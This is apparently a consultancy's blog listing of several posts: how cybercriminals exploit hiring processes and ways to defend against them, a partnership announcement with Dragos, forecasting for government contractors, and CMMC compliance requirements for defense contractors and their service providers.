Posted on Nov 1, 2024
The process of hiring employees has evolved since the days of posting ads in the newspaper. While technological advancements have streamlined recruitment, they have also opened new avenues for cyber threats. Cybercriminals are exploiting hiring processes to infiltrate organizations, steal sensitive data and cause financial and reputation damage. Recent incidents involving North Korean operatives and sophisticated hacking groups highlight the urgency of addressing these risks.
Hiring is often in the hands of trained human resource recruiters. However, it is also often shouldered by those who also wear many hats: office managers, team or department leads and business owners who may not be trained to look out for bad actors. Below, I explore the cyber risks associated with hiring, detail specific tactics used by cybercriminals and offer practical tips for safeguarding against these growing threats.
Case Study: North Korean Operatives Posing as IT Workers
A recent incident uncovered that North Korean IT professionals were attempting to secure employment with U.S. companies by posing as remote workers. These individuals presented impressive resumes and portfolios to appear legitimate. Once hired, they aimed to access sensitive company data and systems, potentially funneling information back to their government.
Tactics Used Against Companies: Impersonation and Fake Profiles
Cybercriminals are creating elaborate fake identities to deceive HR professionals during the hiring process. These fabricated personas often come with detailed resumes, professional social media profiles and endorsements from seemingly reputable sources. The goal is to gain the company’s trust and secure a position that provides access to sensitive information.
Example: An individual might pose as a seasoned software engineer with an impressive work history at well-known tech companies. They provide falsified references that are part of the scam. HR professionals, eager to fill critical positions, may overlook subtle inconsistencies, allowing the impostor to infiltrate the organization.
Malicious Attachments in Applications
Another prevalent tactic involves sending resumes and cover letters embedded with malware. Cybercriminals craft documents that appear legitimate but contain hidden malicious code. When HR personnel open these files, the malware activates and infects the company’s network.
Example: A seemingly innocuous PDF resume triggers the download of ransomware upon opening. The malware encrypts critical files, rendering systems inoperable until a ransom is paid. Such incidents can lead to significant downtime, financial losses and reputation damage.
Compromised Third-Party Recruitment Platforms
Attackers also infiltrate job boards and recruitment platforms to post fake job listings or harvest information from genuine applications. By compromising these third-party services, cybercriminals can cast a wide net, affecting multiple companies and a vast pool of candidates.
Example: An attacker gains access to a popular job board and posts listings for high-demand positions at reputable companies. Unsuspecting HR professionals and job seekers interact with these listings, inadvertently providing valuable information or downloading malicious content. This can lead to unauthorized access to company systems or identity theft for individuals.
Tactics Used Against Job Seekers
Fake Job Offers from Cybercriminals
Scammers are increasingly posing as HR professionals from legitimate companies, reaching out to candidates with enticing job offers. Their objective is to extract personal information, financial details or even direct payments under the guise of processing fees or equipment purchases.
Example: An applicant receives an offer letter that appears official, complete with company logos and professional language. The letter requests a processing fee or sensitive banking information for direct deposit setup. Eager to secure the position, the candidate complies, only to later realize they have been scammed. This tactic not only leads to financial loss but can also result in identity theft.
Phishing Emails Mimicking Recruitment Communications
Phishing remains a common and effective tactic used by cybercriminals. In this context, attackers send emails that appear to be from well-known companies, prompting candidates to click on links or download attachments. These actions lead to credential theft or malware installation on the victim’s device.
Example: A job seeker receives an email requesting them to log into a portal to schedule an interview. The email looks legitimate, featuring company branding and professional language. However, the link directs them to a fake website designed to capture their login credentials or personal information. Such phishing attempts can compromise not only the individual’s data but also any connected accounts, leading to broader security breaches.
Practical Tips for HR Professionals
Implement Rigorous Verification Processes
Thorough Background Checks: Go beyond standard reference checks. Verify educational qualifications, certifications and previous employment using trusted third-party services. Contact previous employers using official contact information found independently, rather than relying solely on details provided by the candidate.
Digital Footprint Analysis: Examine candidates’ online presence across professional networking sites to identify inconsistencies or red flags. Cross-reference resume details with LinkedIn profiles and look for endorsements or connections that validate the candidate’s history.
Secure Recruitment Platforms
Use Official Communication Channels: Ensure all recruitment communications are conducted through company email domains and secure applicant tracking systems. Educate HR staff to avoid using personal emails for professional correspondence and to be wary of unsolicited applications from unknown sources.
Regular Security Audits: Work with IT departments to assess the security of recruitment software and platforms regularly. Implement multi-factor authentication and encryption where possible to protect sensitive data.
Educate HR Staff on Cybersecurity
Training Programs: Conduct regular cybersecurity training focused on the latest threats targeting HR functions. Include modules on recognizing phishing emails, suspicious attachments and social engineering tactics.
Promote a Culture of Vigilance: Encourage staff to report any suspicious activities without fear of reprimand. Establish clear protocols for reporting and responding to potential security incidents.
Collaborate with IT and Cybersecurity Teams
Integrated Security Measures: Develop joint strategies with IT to secure the recruitment process end-to-end. Schedule regular meetings between HR and IT to discuss emerging threats and update security practices accordingly.
Access Controls for New Hires: Implement a phased approach to granting system access to new employees, starting with minimal privileges. Use role-based access control to ensure employees have access only to the resources necessary for their job functions.
Utilize Advanced Security Tools
Malware Detection Software: Invest in advanced antivirus and anti-malware solutions that scan all incoming emails and attachments. Enable automatic scanning of documents in a sandbox environment before they reach HR personnel.
Behavioral Analytics: Deploy systems that monitor user behavior for anomalies, particularly among new hires. Set up alerts for unusual activities, such as large data transfers or access attempts outside of normal working hours.
Protecting Job Seekers from Cyber Threats
Advice for HR Professionals
Transparent Communication: Clearly outline the hiring process on the company’s official website, including the email domains used for correspondence. Provide candidates with contact information to verify the legitimacy of job offers and recruitment communications.
Public Awareness Campaigns: Use social media and professional networks to inform potential applicants about known scams and how to avoid them. Publish articles or posts warning about common fraud tactics and offering guidance.
Advice for Job Seekers
Verify Job Postings and Communications: Cross-check job listings on the company’s official website and be cautious of unsolicited offers. If in doubt, contact the company’s HR department directly using information from the official website.
Protect Personal Information: Avoid sharing sensitive data such as Social Security numbers or bank details until it is legally required and through secure channels. Be skeptical of requests for upfront payments or personal information early in the recruitment process.
Stay Alert to Red Flags: Be wary of poor grammar, generic salutations and inconsistencies in communications purportedly from reputable companies. Trust your instincts; if something feels off, investigate further before proceeding.
The Dual Responsibility: A Collaborative Effort
For Companies
Organizations must acknowledge that cybersecurity is a shared responsibility. By fostering collaboration between HR and IT, companies can develop robust defenses against recruitment-related cyber threats. Integrating cybersecurity considerations into HR policies and procedures is essential. This means embedding security checkpoints throughout the hiring process, from application to onboarding. Providing HR teams with tools and training empowers them to detect and prevent cyber-attacks effectively. Investing in security software and regular training sessions ensures that HR professionals are equipped to recognize and respond to threats.
For HR Professionals
As gatekeepers of talent, HR professionals play a crucial role in safeguarding the organization. Staying informed and vigilant is paramount to reducing the risk of security breaches. Continuous education on the latest cyber threats and best practices in recruitment security enables HR teams to stay ahead of attackers. Encouraging open communication within the team about threats and suspicious activities fosters a proactive security culture.
For Job Seekers
Job seekers must also take responsibility for their cybersecurity. Awareness and caution are vital in preventing scams that could have long-term consequences. Educating themselves about common job search scams and learning how to identify red flags can significantly reduce their risk. Conducting due diligence by researching companies and verifying opportunities before engaging deeply in the application process ensures that they are interacting with legitimate employers.
Act Now
The evolving tactics of cybercriminals underscore the urgent need for enhanced security in the hiring process. Both companies and job seekers are targets, and the consequences of complacency can be severe.
For organizations, integrating cybersecurity into HR practices a defensive and strategic imperative. HR professionals must be equipped with the knowledge and tools to identify and counteract threats. Similarly, job seekers should approach opportunities with a healthy degree of skepticism.
By fostering a collaborative approach and prioritizing education and vigilance, we can strengthen the defenses of our organizations and protect individuals from cyber threats. The responsibility is shared, and the time to act is now.
Read More »
Posted on Jul 17, 2024
The security of our nation’s critical infrastructure has never been more imperative. As partners to our clients in the Defense Industrial Base (DIB) and critical infrastructure, we understand the critical role we play in national security. Our commitment extends beyond compliance; we are dedicated to proactive collaboration and advanced cybersecurity measures. In line with this commitment, we are proud to announce our partnership with Dragos, Inc., a leader in industrial cybersecurity.
Partnership with Dragos, Inc.
Through our partnership with Dragos, Inc., we aim to leverage their expertise in industrial control systems (ICS) and operational technology (OT) cybersecurity. Dragos brings unparalleled capabilities in threat detection, incident response, and vulnerability management tailored for critical infrastructure. This collaboration enhances our ability to provide our clients with the most advanced security solutions, ensuring that their operations remain secure and resilient against emerging threats.
The Dragos Platform received the 2023 SC Award for Best Industrial Security Solution for its ability to help organizations identify their OT assets, manage vulnerabilities, and detect and respond to threats that target industrial control systems. In June, Dragos was named Best Incident Response Solution by SC Awards Europe.
Through this partnership, MNS Group gains the benefits of the Dragos Global Partner Program, the only channel program to comprise OT cybersecurity technology, services, and threat intelligence supported by training that prepares partners as OT cybersecurity experts. The program helps develop and advance resellers as ICS/OT cybersecurity experts and advisors with the full spectrum of OT cybersecurity offerings in their portfolios
MITRE’s Call to Action
Recent insights from MITRE highlight the escalating threats posed by cyberattacks, particularly from nation-state actors such as the Chinese Communist Party (CCP), targeting essential services like energy, transportation, communications, and water systems. This environment necessitates robust measures and innovative solutions to ensure resilience and operational continuity.
MITRE has been vocal about the need for the U.S. government to intensify efforts to safeguard critical infrastructure. A recent MITRE-Harris poll underscores the public’s concern, with 81% of respondents expressing worry over the security of vital services, and 78% believing that the federal government bears full or partial responsibility for fortifying these infrastructures. MITRE’s leadership emphasizes that the threat landscape has evolved significantly, requiring a shift from incremental improvements to comprehensive, coordinated responses involving both public and private sectors.
Proactive Measures and Client Support
We are dedicated to supporting our clients by:
Implementing Advanced Security Protocols: Utilizing the latest technologies and best practices in cybersecurity to protect against sophisticated attacks.
Continuous Monitoring and Threat Intelligence: Providing real-time monitoring and actionable intelligence to preemptively address potential threats.
Training and Awareness Programs: Educating our clients on the latest cyber threats and best practices to maintain robust security postures.
Incident Response and Recovery: Ensuring swift and effective response to any cyber incidents, minimizing downtime and operational impact.
Looking Ahead
As threats to critical infrastructure continue to evolve, so must our strategies and partnerships. We remain committed to collaborating with industry leaders like Dragos, Inc., and aligning with MITRE’s recommendations to enhance our collective resilience. By fostering a culture of security and innovation, we aim to protect the vital services that underpin our nation’s security and prosperity.
For more insights into how we are working to secure critical infrastructure and our strategic partnerships, stay tuned to our updates and reach out to our team for more information.
Read More »
Posted on Apr 30, 2024
Small and medium businesses (SMBs), defined as those with under $25 million in annual revenue, are the economic backbone on which our nation depends. Every state in the union and members of every community have a vested interest in and depend on the success of small and medium businesses. To plan for success, businesses utilize forecasting. Forecasting employs past data to make educated predictions about future trends. Companies use this method to decide on budget allocation or prepare for expected costs in upcoming periods, usually influenced by the anticipated demand for their products and services.
How important is forecasting for SMBs to our nation’s overall economic health and security? Very. This is emphasized further when the focus is narrowed to GovCon SMBs. Their success- or failure- is shared and felt among our nation’s citizens.
“Above all, the forecaster’s task is to map uncertainty, for in a world where our actions in the present influence the future, uncertainty is opportunity.” Paul Saffo
Events over the last several years have allowed ample opportunity for business managers and executives to navigate uncertainty. Indeed, even the concept of certainty seems quaint among GovCons when the US has lost 30% of its defense industrial base (DIB) over the last 10 years, as shared by Isabella Guzman, administrator for the U.S. Small Business Administration (SBA). Forecasting for non-GovCons may include Sales Revenue, Cost of Goods Sold (COGS), Gross Margin, Operating Expenses, Interest and Tax Expenses, Capital Expenditures, Inventory Levels, Accounts Receivable and Payable, Cash Flow, Market Trends and Economic Conditions, Workforce Needs, New Projects and Investments, Break-even and Risk Analysis.
There are abundant challenges for GovCons to consider when forecasting in addition to the lengthy list above that are unique to them due to specific operational, regulatory, and financial environments:
Regulatory Compliance and Changes: GovCons must anticipate and plan for changes in government regulations, which can affect everything from contract bidding to execution.
Budget Cycles and Funding Fluctuations: Government budgets are subject to political processes and fiscal cycles, leading to fluctuations in funding availability. They must have an understanding of the government’s budgeting process, the timing of appropriations and the (frustrating) potential for shutdowns.
Contract Types and Payment Schedules: GovCons deal with a variety of contract types (e.g., fixed-price, cost-reimbursement, time-and-materials) each with its own financial and performance risks. Forecasting must account for the specifics of these contracts, including payment schedules, performance milestones, and risk of adjustments.
Bid and Proposal Efforts: Forecasting in GovCons must include the costs and timelines associated with preparing bids and proposals, as well as the probability of winning contracts.
Long-term Contracts and Lifecycle Management: Many government contracts are for long-term projects that can span several years. Forecasting needs to account for the lifecycle management of these contracts, including potential modifications, maintenance, and operational support.
Security Clearances and Classified Work: Projects requiring security clearances or involving classified information add layers of complexity to forecasting. This includes considerations for personnel clearances, secure facilities, and IT infrastructure.
Public-Private Partnerships and Joint Ventures: GovCons often engage in public-private partnerships or form joint ventures to pursue contracts. Forecasting must consider the dynamics and obligations of these partnerships, including shared risks and revenues.
Market and Political Environment: The demand for government contracting services can be influenced by political priorities, geopolitical events, and changes in policy. Forecasting in this sector requires a deep understanding of these external factors and their potential impact on contract opportunities.
Technology Adoption and Innovation Cycles: Government contracts may involve cutting-edge technology or require adherence to specific technical standards. Forecasting must factor in the costs and timelines for research and development, technology adoption, and potential innovation cycles.
Don’t Miss the Shifts
Are there additional critical areas that GovCon’s should track into the future for their businesses to succeed in a climate of such uncertainty for sake of national security? Yes. As a business that provides compliance, information technology, and business consulting, we have insight into some areas that should be tracked now by GovCons that are often missed.
Survey Says: GovCons are Up at Night
In truth, executives are kept up at night by several issues regarding their companies that are unique to GovCon businesses. The GAUGE 2023 Report, by Unanet and CohnReznick, gathers information from 1,180 survey responses from a variety of government contracting professionals. 60% of respondents were in a C-Suite or Controller role, and more than half of the respondents were small and mid-sized businesses.
Read More »
Posted on Apr 30, 2024
If your business is not a member of the Defense Industrial Base (DIB), and you don’t do work on a contract basis as part of the supply chain to the Department of Defense, you can stop reading now. Seriously. Despite the article’s title, this missive is full of acronyms and explanations of compliance requirements and has nothing to do with breakfast. And did I mention acronyms? I will wait.
Okay, since it is just “us” now, I will share a few high-importance details from the proposed CMMC rule, and specifically how you will work with companies like mine. Managed Services Providers (MSPs), Managed Security Service Providers (MSSPs), and other external service providers (ESPs) have been included in the CMMC fray, and it will impact your business.
Answered questions, with a side of questions
Over the last several years, we have had a lot of questions concerning our clients’ obligations because of the coming Cybersecurity Maturity Model Certification (CMMC). At long last, many of those questions are getting answered; the DoD released the proposed rule on December 26, 2023.
CMMC is the verification mechanism through which the DoD is assured that the contractors and subcontractors they work with have information systems in place to protect the sensitive data they hold. It was created because the DoD discovered that many operational and cybersecurity practices within the DIB were weak making our nation vulnerable to attack. The CMMC rule closes loopholes that have allowed plans of action purposed to remediate the weaknesses to remain open for long periods of time.
Most of our questions have been regarding the more advanced cybersecurity and operational requirements for DIB businesses that process, store, or transmit Controlled Unclassified Information (CUI) and who will need to secure a CMMC Assessment provided by an authorized CMMC Third Party Assessment Organization (C3PAO) at Level 2. Level 1 DIB businesses are required to protect Federal Contract Information (FCI) and are allowed to sell-assess their environment. Both levels 1 and 2 require that a company executive sign an affirmation that they have accurately assessed and are operating under the controls.
The significant update is that businesses classified as Level 1 and Level 2 in the Defense Industrial Base (DIB) sector will face upcoming challenges related to choosing their service providers.
It turns out, the DoD references many of the functions that MSPs perform within the definition of an External Service Provider: “external people, technology… that an organization utilizes for provision and management of comprehensive IT and/or cybersecurity services… CUI or Security Protection Data (e.g., log data, configuration data) must be processed, stored, or transmitted on the ESP assets to be considered an ESP.”
Accordingly, we, the MSPs and MSSPs of the world that serve the DIB, will need to achieve our CMMC certification too! Not only that, but any ESP will need to certify at or above the level of the contractor they support is required to certify. While we have been expecting this and implementing the requirements in our own business, most MSPs or other ESPs have not.
Why does this matter to you? When your company uses an MSP or other external service providers, they are included as “in scope” for your organization’s System Security Plan; they will be included in your assessment. Meaning- you can’t pass your CMMC Assessment unless and until your ESP has passed their assessment and have a final certification as your provider. You will not be able to work for the DoD until all your ESPs have their certification. Let’s just say, there is some debate on how this chicken-and-egg-timing will work itself out… and there are still other considerations as far as timing.
This also means that your team will need to carefully vet the capabilities of every external service provider hired to work for you… and their tools.
Read More »
Posted on Dec 22, 2023
At long last, the CMMC proposed rule will be released on December 26, 2023!
If you have not prepared to pass the CMMC Assessment, there is no time like the present! (And if we may be so bold, we suggest preparing for the journey with some music to get you in the right frame of mind!)
Where does a contractor in the Defense Industrial Base start?
Rally the troops, and choose a leader: CMMC compliance is a team effort. A common misconception of the CMMC program is that it contains all technical controls and requires little coordination with staff not directly involved with IT. However, the CMMC program controls involve much more than technical configurations: human resources, building security, administration and operations, accounting, and even external service and cloud providers may be inscope.
Leadership starts at the top. Management must make clear that conforming to the requirements of CMMC is a priority. Kick off an all-hands meeting to align and educate the entire organization and include goals, defined roles and responsibilities, and communication channels. It is key to have one person designated to serve as the lead to coordinate your team’s efforts. In one company that MNS Group works with, the head of business development led the compliance implementation for the company. Why that role to lead the effort? Lost opportunity. This individual had a lot to lose if the company did not become compliant in time to win the contracts that provided the bulk of his department’s income, and he possessed the skills to educate, encourage, and track the various departments to contributions. Whoever in your organization secures the honor, they will require the support of the management team.
The good news is that if you are working with MNS Group, we are able to assist your team with our CMMC Certified Professionals and Assessors (CCPs and CCAs), with implementation and support toward compliance.
Determine the level you need to comply with.
Your contract and the type of information your company handles determines the level and number of controls your organization must meet. Every defense contractor will need to meet at minimum Level 1. The CMMC 2.0 model consists of three distinct levels, each representing a different set of cybersecurity practices and processes:
Level 1 – Foundational: This level is focused on the protection of Federal Contract Information (FCI) and encompasses the basic safeguarding requirements for this information as outlined in Federal Acquisition Regulation (FAR) 52.204-21. It includes 17 practices that are fundamental to cybersecurity, largely aligning with basic cyber hygiene practices. At this level, companies are required to perform annual self-assessments.
Level 2 – Advanced: Level 2 aligns with the protection of Controlled Unclassified Information (CUI) and is based on a subset of the security requirements specified in NIST SP 800-171. Level 2 applies to you if your company handles CUI; you are already subject to DFARS 252.204-7012 requirements and have been since late 2017. This level includes a total of 110 practices and focuses on the implementation of intermediate cyber hygiene practices to protect CUI. Level 2 requires companies to undergo an independent third-party assessment every three years to ensure compliance.
Level 3 – Expert: This level is intended for companies that are part of the defense industrial base and are handling critical national security information. Level 3 is based on a subset of the security requirements from NIST SP 800-172, along with additional practices and processes from other sources to protect CUI and reduce the risk from Advanced Persistent Threats (APTs). Compliance with Level 3 requires a government-led assessment every three years. The final rule is expected to have greater detail on this level.
Target your efforts based on the level at which your organization must comply.
Scoping
If your company handles, creates, stores, or transmits CUI- who handles it? Where is it accessed, processed, or stored? The environment where CUI exists helps determine your scope. A System Security Plan (SSP) documents what controls are in place. The smaller the environment, the less expensive compliance efforts will be. Some companies find that an enclave for the CUI is a smart solution.
An enclave is a way for organizations to limit the endpoints that need to be secured, making compliance efforts more streamlined, resulting in less expensive and sometimes faster compliance. All contractors to the DoD will have Level 1 controls in-scope applied organization-wide, even if your CUI is confined to an enclave.
Read More »